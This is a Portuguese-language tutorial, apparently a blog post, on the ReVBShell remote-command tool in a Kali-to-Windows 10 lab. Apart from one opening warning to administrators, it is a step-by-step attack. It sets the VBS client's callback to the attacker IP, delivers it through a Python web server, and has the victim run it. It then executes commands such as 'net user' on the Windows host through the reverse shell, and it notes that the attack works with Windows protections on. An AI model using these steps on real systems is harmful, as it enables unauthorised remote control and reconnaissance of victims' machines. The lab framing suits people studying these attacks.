O ReVBShell é um projeto que disponibiliza um script Server desenvolvido em Python e um script Client desenvolvido em VBS que permite a execução de comandos remotamente.
Atenção :
Certifique-se que o AntiVírus e AntiSpam que você administra em sua empresa não permita a execução/recebimento de Script e Ferramentas que possam contribuir com o processo de exploração (ex: PowerShell, VBS, PSTools, etc.), seja restritivo para evitar que um usuário possa clicar em um Client como este.
Server - Kali Linux : 192.168.0.53
Client - Windows 10 : 192.168.0.44
Realize o download do projeto ReVBShell, em seguida entre no diretório e liste os arquivos.
Linuxgit clone https://github.com/bitsadmin/revbshell cd revbshell/ ls -l
Confirme o IP que está usando no Kali Linux, em seguida edite o arquivo client.vbs.
Linuxifconfig | grep "192" vim client.vbs
Informe o IP do Server (Kali Linux) na linha StrHost.
LinuxStrHost = "192.168.0.53"
Você pode enviar o arquivo client.vbs para o Windows de diversas formas, mas uma alternativa pode ser iniciando um WebServer via Python.
Linuxpython -m SimpleHTTPServer
No Windows abra o navegador e digite o IP do Server (Kali Linux) seguido da porta 8000.
http://192.168.0.53:8000
Realize o download e execute o script client.vbs.
Script client.vbs em execução :
Execute o script server.py.
python server.py >
Digite os comandos em letras MAIÚSCULAS, se precisar de ajuda digite HELP.
> SYSINFO > IFCONFIG > SHELL
Após digitar o comando SHELL você pode digitar os comandos do Windows em letras minúsculas :
SHELL> hostname SHELL> net user SHELL> ipconfig
A exploração pode ser realizada mesmo com as proteções do Windows ativadas.